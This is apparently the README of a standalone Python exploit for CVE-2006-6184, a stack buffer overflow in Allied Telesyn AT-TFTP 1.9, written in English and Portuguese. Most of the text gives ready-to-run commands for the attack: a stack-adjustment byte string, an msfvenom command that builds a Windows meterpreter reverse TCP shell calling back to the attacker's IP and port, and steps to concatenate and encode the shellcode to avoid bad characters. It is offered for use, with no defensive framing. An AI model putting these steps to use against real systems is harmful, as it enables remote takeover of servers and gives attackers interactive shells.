
This is a python-based standalone exploit for CVE-2006-6184. This exploit triggers a stack-based buffer overflows in Allied Telesyn TFTP Server (AT-TFTP) 1.9, and possibly earlier, allow remote attackers to cause a denial of service or execute arbitrary code.
Este é um exploit autônomo baseado em Python para CVE-2006-6184. Este exploit aciona um estouro de buffer baseado em pilha no Allied Telesyn TFTP Server (AT-TFTP) 1.9, e possivelmente versões anteriores, permitindo que invasores remotos causem uma negação de serviço ou executem código arbitrário.
O payload deve ser personalizado para incluir seu próprio endereço IP e porta de escuta, então você precisará gerá-lo manualmente. Para isso, use os seguintes passos:
1.) Execute o seguinte comando para criar um arquivo hex da quantidade que precisa ser subtraída do ponteiro de pilha (3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) Em seguida, use o seguinte comando para criar um payload de shell meterpreter encadeado:
msfvenom -p windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) Então, combine os dois arquivos que você acabou de criar.
cat stackadj payload > shellcode
4.) Finalmente, vamos eliminar os caracteres ruins.
msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python
Insira a saída como o valor da variável "payload". Pode ser necessário executar este exploit algumas vezes para que funcione.